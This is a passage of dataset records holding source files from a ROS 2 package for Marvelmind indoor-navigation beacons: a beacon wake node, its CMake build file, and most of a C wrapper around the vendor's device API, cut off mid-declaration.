"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 727,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 31,
"path": "/marvelmind_nav/src/wake_beacon_node.cpp",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "#include <chrono>\n#include <string>\n#include <iostream> \n#include \"rclcpp/rclcpp.hpp\"\n#include \"std_msgs/msg/string.hpp\"\nextern \"C\"\n{\n#include \"marvelmind_nav/marvelmind_example.h\"\n#include \"marvelmind_nav/marvelmind_devices.h\"\n#include \"marvelmind_nav/marvelmind_utils.h\"\n#include \"marvelmind_nav/marvelmind_pos.h\"\n#include \"marvelmind_nav/marvelmind_api.h\"\n}\n\nusing namespace std::chrono_literals;\n\nint main()\n{\n marvelmindStart();\n char str[6] = {'w', 'a', 'k', 'e', ' ','0'};\n char *token1 = strtok(str, \" \");\n trim(token1);\n char *token2 = strtok(NULL, \" \");\n while(!marvelmindCycle());\n while(marvelmindCheckWakeCommand(token1, token2));\n sleep_ms(10000);\n\n marvelmindFinish();\n\n return 0;\n}"
},
{
"alpha_fraction": 0.6565752029418945,
"alphanum_fraction": 0.6597287654876709,
"avg_line_length": 30.08823585510254,
"blob_id": "833f261443c30f03a04af2edea1b06e6215c93ff",
"content_id": "c49e766f786ecfebd00b133ee92b2ac62ea6954c",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 3171,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 102,
"path": "/marvelmind_nav/CMakeLists.txt",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "cmake_minimum_required(VERSION 3.5)\nproject(marvelmind_nav)\n\n# Default to C99\nif(NOT CMAKE_C_STANDARD)\n set(CMAKE_C_STANDARD 99)\nendif()\n\n# Default to C++14\nif(NOT CMAKE_CXX_STANDARD)\n set(CMAKE_CXX_STANDARD 14)\nendif()\n\nif(CMAKE_COMPILER_IS_GNUCXX OR CMAKE_CXX_COMPILER_ID MATCHES \"Clang\")\n add_compile_options(-Wall -Wextra -Wpedantic)\nendif()\n\n# Dependencies\nfind_package(ament_cmake REQUIRED)\nfind_package(rclcpp REQUIRED)\nfind_package(std_msgs REQUIRED)\nfind_package(rclcpp_lifecycle REQUIRED)\nfind_package(lifecycle_msgs REQUIRED)\nfind_package(marvelmind_interfaces REQUIRED)\nfind_package(rmw REQUIRED) #QoS\n\n# Declare includes and libraries\ninclude_directories(include)\nament_export_include_directories(include)\nadd_library(marvelmind_nav_lib\n src/marvelmind_hedge.c\n src/marvelmind_api.c\n src/marvelmind_devices.c\n src/marvelmind_example.c\n src/marvelmind_pos.c\n src/marvelmind_utils.c\n)\n\n# Executables\nadd_executable(marvelmind_nav src/marvelmind_navigation.cpp\n src/marvelmind_hedge.c)\nament_target_dependencies(marvelmind_nav rclcpp std_msgs marvelmind_interfaces)\n\n# add_executable(talker src/publisher_member_function.cpp\n# \t\t\t src/marvelmind_hedge.c\n# src/marvelmind_api.c\n# src/marvelmind_devices.c\n# src/marvelmind_example.c\n# src/marvelmind_pos.c\n# src/marvelmind_utils.c)\n# ament_target_dependencies(talker rclcpp std_msgs)\n\nadd_executable(wake_beacon src/wake_beacon_node.cpp\n\t\t\t src/marvelmind_hedge.c\n src/marvelmind_api.c\n src/marvelmind_devices.c\n src/marvelmind_example.c\n src/marvelmind_pos.c\n src/marvelmind_utils.c)\nament_target_dependencies(wake_beacon rclcpp std_msgs)\n\nadd_executable(sleep_beacon src/sleep_beacon_node.cpp\n\t\t\t src/marvelmind_hedge.c\n src/marvelmind_api.c\n src/marvelmind_devices.c\n src/marvelmind_example.c\n src/marvelmind_pos.c\n src/marvelmind_utils.c)\nament_target_dependencies(sleep_beacon rclcpp std_msgs)\n\n#ament_target_dependencies(talker rclcpp std_msgs)\ntarget_link_libraries(marvelmind_nav\n ${rclcpp_lifecycle_LIBRARIES}\n ${std_msgs_LIBRARIES}\n)\n\n\n# Installation\ninstall(TARGETS\n marvelmind_nav\n sleep_beacon\n wake_beacon\n DESTINATION lib/${PROJECT_NAME})\n\n\ninstall(DIRECTORY\n launch\n DESTINATION share/${PROJECT_NAME}/\n)\n\nif(BUILD_TESTING)\n find_package(ament_lint_auto REQUIRED)\n # the following line skips the linter which checks for copyrights\n # uncomment the line when a copyright and license is not present in all source files\n #set(ament_cmake_copyright_FOUND TRUE)\n # the following line skips cpplint (only works in a git repo)\n # uncomment the line when this package is not in a git repo\n #set(ament_cmake_cpplint_FOUND TRUE)\n ament_lint_auto_find_test_dependencies()\nendif()\n\nament_package()\n"
},
{
"alpha_fraction": 0.6126958131790161,
"alphanum_fraction": 0.6329208612442017,
"avg_line_length": 28.57028579711914,
"blob_id": "3f9821075c93df2848392f735b839848ed907dc1",
"content_id": "c0f180358b0e208a495f5bbc7fdcb1020f0c50ea",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 26749,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 875,
"path": "/marvelmind_nav/src/marvelmind_api.c",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "#include \"marvelmind_nav/marvelmind_api.h\"\r\n\r\n#define __stdcall\r\n#ifdef WIN32\r\n#include <windows.h>\r\n#else\r\n// extern \"C\" {\r\n#include <dlfcn.h>\r\n// }\r\n#endif\r\n\r\n#ifdef WIN32\r\nHINSTANCE mmLibrary;\r\n#else\r\nvoid* mmLibrary;\r\n#endif\r\n\r\ntypedef bool (*pt_mm_api_version)(void *pdata);\r\nstatic pt_mm_api_version pmm_api_version= NULL;\r\nbool mmAPIVersion(uint32_t *version) {\r\n if (pmm_api_version == NULL)\r\n return false;\r\n\r\n uint8_t buf[8];\r\n bool res= (*pmm_api_version)(&buf[0]);\r\n\r\n *version= *((uint32_t *) &buf[0]);\r\n\r\n return res;\r\n}\r\n\r\ntypedef bool (*pt_mm_open_port)(void);\r\nstatic pt_mm_open_port pmm_open_port= NULL;\r\nbool mmOpenPort() {\r\n // printf(\"oooo\\n\");\r\n if (pmm_open_port == NULL)\r\n return false;\r\n \r\n return (*pmm_open_port)();\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_open_port_by_name)(void *pdata);\r\nstatic pt_mm_open_port_by_name pmm_open_port_by_name= NULL;\r\nbool mmOpenPortByName(char *portName) {\r\n if (pmm_open_port_by_name == NULL)\r\n return false;\r\n\r\n uint8_t buf[255];\r\n uint8_t i;\r\n for(i=0;i<255;i++) {\r\n buf[i]= portName[i];\r\n if (buf[i] == 0)\r\n break;\r\n }\r\n for(i=0;i<255;i++) {\r\n printf(\"%u\",portName[i]);\r\n if (buf[i] == 0)\r\n printf(\"\\n\");\r\n break;\r\n } \r\n return (*pmm_open_port_by_name)(&buf[0]);\r\n}\r\n\r\n//////\r\n\r\ntypedef void (*pt_mm_close_port)(void);\r\nstatic pt_mm_close_port pmm_close_port= NULL;\r\nvoid mmClosePort() {\r\n if (pmm_close_port == NULL)\r\n return;\r\n\r\n (*pmm_close_port)();\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_get_version_and_id)(uint8_t address, void *pdata);\r\nstatic pt_mm_get_version_and_id pmm_get_version_and_id= NULL;\r\nbool mmGetVersionAndId(uint8_t address, MarvelmindDeviceVersion *mmDevVersion) {\r\n if (pmm_get_version_and_id == NULL)\r\n return false;\r\n\r\n uint8_t buf[128];\r\n bool res= (*pmm_get_version_and_id)(address, &buf[0]);\r\n\r\n mmDevVersion->fwVerMajor= buf[0];\r\n mmDevVersion->fwVerMinor= buf[1];\r\n mmDevVersion->fwVerMinor2= buf[2];\r\n mmDevVersion->fwVerDeviceType= buf[3];\r\n mmDevVersion->fwOptions= buf[4];\r\n\r\n mmDevVersion->cpuId= *((uint32_t *) &buf[5]);\r\n\r\n return res;\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_get_devices_list)(void *pdata);\r\nstatic pt_mm_get_devices_list pmm_get_devices_list= NULL;\r\nbool mmGetDevicesList(MarvelmindDevicesList *mmDevices) {\r\n if (pmm_get_devices_list == NULL)\r\n return false;\r\n\r\n uint8_t buf[(MM_MAX_DEVICES_COUNT+1)*10];\r\n\r\n bool res= (*pmm_get_devices_list)(&buf[0]);\r\n\r\n if (res) {\r\n uint8_t i;\r\n MarvelmindDeviceInfo *devPtr;\r\n\r\n mmDevices->numDevices= buf[0];\r\n\r\n uint32_t ofs= 1;\r\n for(i=0;i<mmDevices->numDevices;i++) {\r\n devPtr= &mmDevices->devices[i];\r\n\r\n devPtr->address= buf[ofs+0];\r\n devPtr->isDuplicatedAddress= (bool) buf[ofs+1];\r\n devPtr->isSleeping= (bool) buf[ofs+2];\r\n\r\n devPtr->fwVerMajor= buf[ofs+3];\r\n devPtr->fwVerMinor= buf[ofs+4];\r\n devPtr->fwVerMinor2= buf[ofs+5];\r\n devPtr->fwVerDeviceType= buf[ofs+6];\r\n\r\n devPtr->fwOptions= buf[ofs+7];\r\n\r\n devPtr->flags= buf[ofs+8];\r\n\r\n ofs+= 9;\r\n }\r\n }\r\n\r\n return res;\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_wake_device)(uint8_t address);\r\nstatic pt_mm_wake_device pmm_wake_device= NULL;\r\nbool mmWakeDevice(uint8_t address) {\r\n if (pmm_wake_device == NULL)\r\n return false;\r\n\r\n bool res= (*pmm_wake_device)(address);\r\n\r\n return res;\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_sleep_device)(uint8_t address);\r\nstatic pt_mm_sleep_device pmm_sleep_device= NULL;\r\nbool mmSendToSleepDevice(uint8_t address) {\r\n if (pmm_sleep_device == NULL)\r\n return false;\r\n\r\n bool res= (*pmm_sleep_device)(address);\r\n\r\n return res;\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_get_beacon_tele) (uint8_t address, void *pdata);\r\nstatic pt_mm_get_beacon_tele pmm_get_beacon_tele= NULL;\r\nbool mmGetBeaconTelemetry(uint8_t address, MarvelmindBeaconTelemetry *bTele) {\r\n if (pmm_get_beacon_tele == NULL)\r\n return false;\r\n\r\n uint8_t buf[128];\r\n uint8_t i;\r\n bool res= (*pmm_get_beacon_tele)(address, (void *) &buf[0]);\r\n\r\n bTele->worktimeSec= *((uint32_t *) &buf[0]);\r\n bTele->rssi= *((int8_t *) &buf[4]);\r\n bTele->temperature= *((int8_t *) &buf[5]);\r\n bTele->voltageMv= *((uint16_t *) &buf[6]);\r\n\r\n for(i=0;i<16;i++) {\r\n bTele->reserved[i]= buf[8+i];\r\n }\r\n\r\n return res;\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_get_last_locations) (void *pdata);\r\nstatic pt_mm_get_last_locations pmm_get_last_locations= NULL;\r\nbool mmGetLastLocations(MarvelmindLocationsPack *posPack) {\r\n if (pmm_get_last_locations == NULL)\r\n return false;\r\n\r\n uint8_t buf[512];\r\n uint8_t i;\r\n bool res= (*pmm_get_last_locations)((void *) &buf[0]);\r\n\r\n uint16_t ofs= 0;\r\n MarvelmindDeviceLocation *ppos;\r\n for(i=0;i<MM_LOCATIONS_PACK_SIZE;i++) {\r\n ppos= &posPack->pos[i];\r\n\r\n ppos->address= buf[ofs+0];\r\n ppos->headIndex= buf[ofs+1];\r\n\r\n ppos->x_mm= *((int32_t *) &buf[ofs+2]);\r\n ppos->y_mm= *((int32_t *) &buf[ofs+6]);\r\n ppos->z_mm= *((int32_t *) &buf[ofs+10]);\r\n\r\n ppos->statusFlags= buf[ofs+14];\r\n ppos->quality= buf[ofs+15];\r\n\r\n ppos->reserved[0]= buf[ofs+16];\r\n ppos->reserved[1]= buf[ofs+17];\r\n\r\n ofs+= 18;\r\n }\r\n\r\n posPack->lastDistUpdated= buf[ofs++];\r\n for(i=0;i<5;i++) {\r\n posPack->reserved[i]= buf[ofs++];\r\n }\r\n\r\n posPack->userPayloadSize= buf[ofs++];\r\n uint8_t n= posPack->userPayloadSize;\r\n if (n>MM_USER_PAYLOAD_BUF_SIZE) {\r\n n= MM_USER_PAYLOAD_BUF_SIZE;\r\n }\r\n for(i=0;i<n;i++) {\r\n posPack->userPayloadBuf[i]= buf[ofs++];\r\n }\r\n\r\n return res;\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_get_last_locations2) (void *pdata);\r\nstatic pt_mm_get_last_locations2 pmm_get_last_locations2= NULL;\r\nbool mmGetLastLocations2(MarvelmindLocationsPack2 *posPack) {\r\n if (pmm_get_last_locations2 == NULL)\r\n return false;\r\n\r\n uint8_t buf[512];\r\n uint8_t i;\r\n bool res= (*pmm_get_last_locations2)((void *) &buf[0]);\r\n\r\n uint16_t ofs= 0;\r\n MarvelmindDeviceLocation2 *ppos;\r\n for(i=0;i<MM_LOCATIONS_PACK_SIZE;i++) {\r\n ppos= &posPack->pos[i];\r\n\r\n ppos->address= buf[ofs+0];\r\n ppos->headIndex= buf[ofs+1];\r\n\r\n ppos->x_mm= *((int32_t *) &buf[ofs+2]);\r\n ppos->y_mm= *((int32_t *) &buf[ofs+6]);\r\n ppos->z_mm= *((int32_t *) &buf[ofs+10]);\r\n\r\n ppos->statusFlags= buf[ofs+14];\r\n ppos->quality= buf[ofs+15];\r\n\r\n ppos->reserved[0]= buf[ofs+16];\r\n ppos->reserved[1]= buf[ofs+17];\r\n\r\n ppos->angle= *((uint16_t *) &buf[ofs+18]);\r\n ppos->angleReady= ((ppos->angle&0x1000) == 0);\r\n\r\n ofs+= 20;\r\n }\r\n\r\n posPack->lastDistUpdated= buf[ofs++];\r\n for(i=0;i<5;i++) {\r\n posPack->reserved[i]= buf[ofs++];\r\n }\r\n\r\n posPack->userPayloadSize= buf[ofs++];\r\n uint8_t n= posPack->userPayloadSize;\r\n if (n>MM_USER_PAYLOAD_BUF_SIZE) {\r\n n= MM_USER_PAYLOAD_BUF_SIZE;\r\n }\r\n for(i=0;i<n;i++) {\r\n posPack->userPayloadBuf[i]= buf[ofs++];\r\n }\r\n\r\n return res;\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_get_last_distances) (void *pdata);\r\nstatic pt_mm_get_last_distances pmm_get_last_distances= NULL;\r\nbool mmGetLastDistances(MarvelmindDistances *distPack) {\r\n if (pmm_get_last_distances == NULL)\r\n return false;\r\n\r\n uint8_t buf[512];\r\n uint8_t i;\r\n bool res= (*pmm_get_last_distances)((void *) &buf[0]);\r\n\r\n distPack->numDistances= buf[0];\r\n if (distPack->numDistances > MM_DISTANCES_PACK_MAX_SIZE) {\r\n distPack->numDistances= MM_DISTANCES_PACK_MAX_SIZE;\r\n }\r\n\r\n uint16_t ofs= 1;\r\n MarvelmindDistance *pdist;\r\n for(i=0;i<distPack->numDistances;i++) {\r\n pdist= &distPack->distance[i];\r\n\r\n pdist->addressRx= buf[ofs+0];\r\n pdist->headRx= buf[ofs+1];\r\n pdist->addressTx= buf[ofs+2];\r\n pdist->headTx= buf[ofs+3];\r\n\r\n pdist->distance_mm= *((uint32_t *) &buf[ofs+4]);\r\n\r\n pdist->reserved= buf[ofs+8];\r\n\r\n ofs+= 9;\r\n }\r\n\r\n return res;\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_get_update_rate_setting) (float *updRateHz);\r\nstatic pt_mm_get_update_rate_setting pmm_get_update_rate_setting= NULL;\r\nbool mmGetUpdateRateSetting(float *updRateHz) {\r\n if (pmm_get_update_rate_setting == NULL)\r\n return false;\r\n\r\n uint8_t buf[8];\r\n bool res= (*pmm_get_update_rate_setting)((void *) &buf[0]);\r\n\r\n if (res) {\r\n uint32_t updRate_mHz= *((uint32_t *) &buf[0]);\r\n\r\n *updRateHz= updRate_mHz/1000.0;\r\n }\r\n\r\n return res;\r\n}\r\n\r\ntypedef bool (*pt_mm_set_update_rate_setting) (float *updRateHz);\r\nstatic pt_mm_set_update_rate_setting pmm_set_update_rate_setting= NULL;\r\nbool mmSetUpdateRateSetting(float *updRateHz) {\r\n if (pmm_set_update_rate_setting == NULL)\r\n return false;\r\n\r\n uint8_t buf[8];\r\n\r\n uint32_t updRate_mHz= (*updRateHz)*1000.0;\r\n *((uint32_t *) &buf[0])= updRate_mHz;\r\n\r\n bool res= (*pmm_set_update_rate_setting)((void *) &buf[0]);\r\n\r\n return res;\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_add_submap) (uint8_t submapId);\r\nstatic pt_mm_add_submap pmm_add_submap= NULL;\r\nbool mmAddSubmap(uint8_t submapId) {\r\n if (pmm_add_submap == NULL)\r\n return false;\r\n\r\n bool res= (*pmm_add_submap)(submapId);\r\n\r\n return res;\r\n}\r\n\r\ntypedef bool (*pt_mm_delete_submap) (uint8_t submapId);\r\nstatic pt_mm_delete_submap pmm_delete_submap= NULL;\r\nbool mmDeleteSubmap(uint8_t submapId) {\r\n if (pmm_delete_submap == NULL)\r\n return false;\r\n\r\n bool res= (*pmm_delete_submap)(submapId);\r\n\r\n return res;\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_freeze_submap) (uint8_t submapId);\r\nstatic pt_mm_freeze_submap pmm_freeze_submap= NULL;\r\nbool mmFreezeSubmap(uint8_t submapId) {\r\n if (pmm_freeze_submap == NULL)\r\n return false;\r\n\r\n bool res= (*pmm_freeze_submap)(submapId);\r\n\r\n return res;\r\n}\r\n\r\ntypedef bool (*pt_mm_unfreeze_submap) (uint8_t submapId);\r\nstatic pt_mm_unfreeze_submap pmm_unfreeze_submap= NULL;\r\nbool mmUnfreezeSubmap(uint8_t submapId) {\r\n if (pmm_unfreeze_submap == NULL)\r\n return false;\r\n\r\n bool res= (*pmm_unfreeze_submap)(submapId);\r\n\r\n return res;\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_get_submap_settings) (uint8_t submapId, void *pdata);\r\nstatic pt_mm_get_submap_settings pmm_get_submap_settings= NULL;\r\nbool mmGetSubmapSettings(uint8_t submapId, MarvelmindSubmapSettings *submapSettings) {\r\n if (pmm_get_submap_settings == NULL)\r\n return false;\r\n\r\n uint8_t buf[512];\r\n uint8_t i;\r\n bool res= (*pmm_get_submap_settings)(submapId, (void *) &buf[0]);\r\n\r\n submapSettings->startingBeacon= buf[0];\r\n submapSettings->startingSet_1= buf[1];\r\n submapSettings->startingSet_2= buf[2];\r\n submapSettings->startingSet_3= buf[3];\r\n submapSettings->startingSet_4= buf[4];\r\n\r\n submapSettings->enabled3d= (bool) buf[5];\r\n submapSettings->onlyForZ= (bool) buf[6];\r\n\r\n submapSettings->limitationDistanceIsManual= (bool) buf[7];\r\n submapSettings->maximumDistanceManual_m= buf[8];\r\n\r\n submapSettings->submapShiftX_cm= *((int16_t *) &buf[9]);\r\n submapSettings->submapShiftY_cm= *((int16_t *) &buf[11]);\r\n submapSettings->submapShiftZ_cm= *((int16_t *) &buf[13]);\r\n submapSettings->submapRotation_cdeg= *((uint16_t *) &buf[15]);\r\n\r\n submapSettings->planeQw= *((int16_t *) &buf[17]);\r\n submapSettings->planeQx= *((int16_t *) &buf[19]);\r\n submapSettings->planeQy= *((int16_t *) &buf[21]);\r\n submapSettings->planeQz= *((int16_t *) &buf[23]);\r\n\r\n submapSettings->serviceZoneThickness_cm= *((int16_t *) &buf[25]);\r\n\r\n submapSettings->hedgesHeightFor2D_cm= *((int16_t *) &buf[27]);\r\n\r\n submapSettings->frozen= (bool) buf[29];\r\n submapSettings->locked= (bool) buf[30];\r\n\r\n submapSettings->beaconsHigher= (bool) buf[31];\r\n submapSettings->mirrored= (bool) buf[32];\r\n\r\n uint8_t ofs= 33;\r\n for(i=0;i<MM_SUBMAP_BEACONS_MAX_NUM;i++) {\r\n submapSettings->beacons[i]= buf[ofs+i];\r\n }\r\n ofs+= MM_SUBMAP_BEACONS_MAX_NUM;\r\n\r\n for(i=0;i<MM_NEARBY_SUBMAPS_MAX_NUM;i++) {\r\n submapSettings->nearbySubmaps[i]= buf[ofs+i];\r\n }\r\n ofs+= MM_NEARBY_SUBMAPS_MAX_NUM;\r\n\r\n submapSettings->serviceZonePointsNum= buf[ofs++];\r\n for(i=0;i<MM_SUBMAP_SERVICE_ZONE_MAX_POINTS;i++) {\r\n submapSettings->serviceZonePolygon[i].x= *((int16_t *) &buf[ofs]);\r\n submapSettings->serviceZonePolygon[i].y= *((int16_t *) &buf[ofs+2]);\r\n\r\n ofs+= 4;\r\n }\r\n\r\n return res;\r\n}\r\n\r\n\r\ntypedef bool (*pt_mm_set_submap_settings) (uint8_t submapId, void *pdata);\r\nstatic pt_mm_set_submap_settings pmm_set_submap_settings= NULL;\r\nbool mmSetSubmapSettings(uint8_t submapId, MarvelmindSubmapSettings *submapSettings) {\r\n if (pmm_set_submap_settings == NULL)\r\n return false;\r\n\r\n uint8_t buf[512];\r\n uint8_t i;\r\n\r\n buf[0]= submapSettings->startingBeacon;\r\n buf[1]= submapSettings->startingSet_1;\r\n buf[2]= submapSettings->startingSet_2;\r\n buf[3]= submapSettings->startingSet_3;\r\n buf[4]= submapSettings->startingSet_4;\r\n\r\n buf[5]= (uint8_t) submapSettings->enabled3d;\r\n buf[6]= (uint8_t) submapSettings->onlyForZ;\r\n\r\n buf[7]= (uint8_t) submapSettings->limitationDistanceIsManual;\r\n buf[8]= submapSettings->maximumDistanceManual_m;\r\n\r\n *((int16_t *) &buf[9])= submapSettings->submapShiftX_cm;\r\n *((int16_t *) &buf[11])= submapSettings->submapShiftY_cm;\r\n *((int16_t *) &buf[13])= submapSettings->submapShiftZ_cm;\r\n *((uint16_t *) &buf[15])= submapSettings->submapRotation_cdeg;\r\n\r\n *((int16_t *) &buf[17])= submapSettings->planeQw;\r\n *((int16_t *) &buf[19])= submapSettings->planeQx;\r\n *((int16_t *) &buf[21])= submapSettings->planeQy;\r\n *((int16_t *) &buf[23])= submapSettings->planeQz;\r\n\r\n *((int16_t *) &buf[25])= submapSettings->serviceZoneThickness_cm;\r\n\r\n *((int16_t *) &buf[27])= submapSettings->hedgesHeightFor2D_cm;\r\n\r\n buf[29]= (uint8_t) submapSettings->frozen;\r\n buf[30]= (uint8_t) submapSettings->locked;\r\n\r\n buf[31]= (uint8_t) submapSettings->beaconsHigher;\r\n buf[32]= (uint8_t) submapSettings->mirrored;\r\n\r\n uint8_t ofs= 33;\r\n for(i=0;i<MM_SUBMAP_BEACONS_MAX_NUM;i++) {\r\n buf[ofs+i]= submapSettings->beacons[i];\r\n }\r\n ofs+= MM_SUBMAP_BEACONS_MAX_NUM;\r\n\r\n for(i=0;i<MM_NEARBY_SUBMAPS_MAX_NUM;i++) {\r\n buf[ofs+i]= submapSettings->nearbySubmaps[i];\r\n }\r\n ofs+= MM_NEARBY_SUBMAPS_MAX_NUM;\r\n\r\n buf[ofs++]= submapSettings->serviceZonePointsNum;\r\n for(i=0;i<MM_SUBMAP_SERVICE_ZONE_MAX_POINTS;i++) {\r\n *((int16_t *) &buf[ofs])= submapSettings->serviceZonePolygon[i].x;\r\n *((int16_t *) &buf[ofs+2])= submapSettings->serviceZonePolygon[i].y;\r\n\r\n ofs+= 4;\r\n }\r\n\r\n bool res= (*pmm_set_submap_settings)(submapId, (void *) &buf[0]);\r\n\r\n return res;\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_get_ultrasound_settings) (uint8_t address, void *pdata);\r\nstatic pt_mm_get_ultrasound_settings pmm_get_ultrasound_settings= NULL;\r\nbool mmGetUltrasoundSettings(uint8_t address, MarvelmindUltrasoundSettings *usSettings) {\r\n if (pmm_get_ultrasound_settings == NULL)\r\n return false;\r\n\r\n uint8_t buf[64];\r\n uint8_t i;\r\n bool res= (*pmm_get_ultrasound_settings)(address, (void *) &buf[0]);\r\n\r\n if (res) {\r\n usSettings->txFrequency_hz= *((uint16_t *) &buf[0]);\r\n usSettings->txPeriodsNumber= buf[2];\r\n\r\n usSettings->rxAmplifierAGC= (bool) buf[3];\r\n usSettings->rxAmplificationManual= *((uint16_t *) &buf[4]);\r\n\r\n for(i=0;i<MM_US_SENSORS_NUM;i++) {\r\n usSettings->sensorsNormal[i]= (bool) buf[6+i];\r\n }\r\n for(i=0;i<MM_US_SENSORS_NUM;i++) {\r\n usSettings->sensorsFrozen[i]= (bool) buf[11+i];\r\n }\r\n\r\n usSettings->rxDSPFilterIndex= buf[16];\r\n }\r\n\r\n return res;\r\n}\r\n\r\ntypedef bool (*pt_mm_set_ultrasound_settings) (uint8_t address, void *pdata);\r\nstatic pt_mm_set_ultrasound_settings pmm_set_ultrasound_settings= NULL;\r\nbool mmSetUltrasoundSettings(uint8_t address, MarvelmindUltrasoundSettings *usSettings) {\r\n if (pmm_set_ultrasound_settings == NULL)\r\n return false;\r\n\r\n uint8_t buf[64];\r\n uint8_t i;\r\n\r\n *((uint16_t *) &buf[0])= usSettings->txFrequency_hz;\r\n buf[2]= usSettings->txPeriodsNumber;\r\n\r\n buf[3]= (uint8_t) usSettings->rxAmplifierAGC;\r\n *((uint16_t *) &buf[4])= usSettings->rxAmplificationManual;\r\n\r\n for(i=0;i<MM_US_SENSORS_NUM;i++) {\r\n buf[6+i]= (uint8_t) usSettings->sensorsNormal[i];\r\n }\r\n for(i=0;i<MM_US_SENSORS_NUM;i++) {\r\n buf[11+i]= (uint8_t) usSettings->sensorsFrozen[i];\r\n }\r\n\r\n buf[16]= usSettings->rxDSPFilterIndex;\r\n\r\n bool res= (*pmm_set_ultrasound_settings)(address, (void *) &buf[0]);\r\n\r\n return res;\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_erase_map) ();\r\nstatic pt_mm_erase_map pmm_erase_map= NULL;\r\nbool mmEraseMap() {\r\n if (pmm_erase_map == NULL)\r\n return false;\r\n\r\n return (*pmm_erase_map)();\r\n}\r\n\r\ntypedef bool (*pt_mm_set_default_settings) (uint8_t address);\r\nstatic pt_mm_set_default_settings pmm_set_default_settings= NULL;\r\nbool mmSetDefaultSettings(uint8_t address) {\r\n if (pmm_set_default_settings == NULL)\r\n return false;\r\n\r\n return (*pmm_set_default_settings)(address);\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_beacons_to_axes) (void *pdata);\r\nstatic pt_mm_beacons_to_axes pmm_beacons_to_axes= NULL;\r\nbool mmBeaconsToAxes(uint8_t address_0, uint8_t address_x, uint8_t address_y) {\r\n if (pmm_beacons_to_axes == NULL)\r\n return false;\r\n\r\n uint8_t buf[64];\r\n\r\n buf[0]= address_0;\r\n buf[1]= address_x;\r\n buf[2]= address_y;\r\n\r\n return (*pmm_beacons_to_axes)((void *) &buf[0]);\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_read_flash_dump) (uint32_t offset, uint32_t size, void *pdata);\r\nstatic pt_read_flash_dump pmm_read_flash_dump= NULL;\r\nbool mmReadFlashDump(uint32_t offset, uint32_t size, void *pdata) {\r\n if (pmm_read_flash_dump == NULL)\r\n return false;\r\n\r\n return (*pmm_read_flash_dump)(offset, size, pdata);\r\n}\r\n\r\ntypedef bool (*pt_write_flash_dump) (uint32_t offset, uint32_t size, void *pdata);\r\nstatic pt_write_flash_dump pmm_write_flash_dump= NULL;\r\nbool mmWriteFlashDump(uint32_t offset, uint32_t size, void *pdata) {\r\n if (pmm_write_flash_dump == NULL)\r\n return false;\r\n\r\n return (*pmm_write_flash_dump)(offset, size, pdata);\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_reset_device) (uint8_t address);\r\nstatic pt_mm_reset_device pmm_reset_device= NULL;\r\nbool mmResetDevice(uint8_t address) {\r\n if (pmm_reset_device == NULL)\r\n return false;\r\n\r\n return (*pmm_reset_device)(address);\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_get_air_temperature) (void *pdata);\r\nstatic pt_mm_get_air_temperature pmm_get_air_temperature= NULL;\r\nbool mmGetAirTemperature(int8_t *ptemperature) {\r\n if (pmm_get_air_temperature == NULL)\r\n return false;\r\n\r\n uint8_t buf[64];\r\n\r\n bool res= (*pmm_get_air_temperature)((void *) &buf[0]);\r\n if (res) {\r\n *ptemperature= (int8_t) buf[0];\r\n }\r\n\r\n return res;\r\n}\r\n\r\ntypedef bool (*pt_mm_set_air_temperature) (void *pdata);\r\nstatic pt_mm_set_air_temperature pmm_set_air_temperature= NULL;\r\nbool mmSetAirTemperature(int8_t temperature) {\r\n if (pmm_set_air_temperature == NULL)\r\n return false;\r\n\r\n uint8_t buf[64];\r\n buf[0]= temperature;\r\n\r\n return (*pmm_set_air_temperature)((void *) &buf[0]);\r\n}\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_set_beacon_location) (uint8_t address, void *pdata);\r\nstatic pt_mm_set_beacon_location pmm_set_beacon_location= NULL;\r\nbool mmSetBeaconLocation(uint8_t address, int32_t x_mm, int32_t y_mm, int32_t z_mm) {\r\n if (pmm_set_beacon_location == NULL)\r\n return false;\r\n\r\n uint8_t buf[64];\r\n\r\n *((int32_t *) &buf[0])= x_mm;\r\n *((int32_t *) &buf[4])= y_mm;\r\n *((int32_t *) &buf[8])= z_mm;\r\n\r\n return (*pmm_set_beacon_location)(address, (void *) &buf[0]);\r\n}\r\n\r\n\r\n//////\r\n\r\ntypedef bool (*pt_mm_device_is_modem)(uint8_t deviceType);\r\nstatic pt_mm_device_is_modem pmm_device_is_modem= NULL;\r\nbool mmDeviceIsModem(uint8_t deviceType) {\r\n if (pmm_device_is_modem == NULL)\r\n return false;\r\n\r\n return (*pmm_device_is_modem)(deviceType);\r\n}\r\n\r\ntypedef bool (*pt_mm_device_is_beacon)(uint8_t 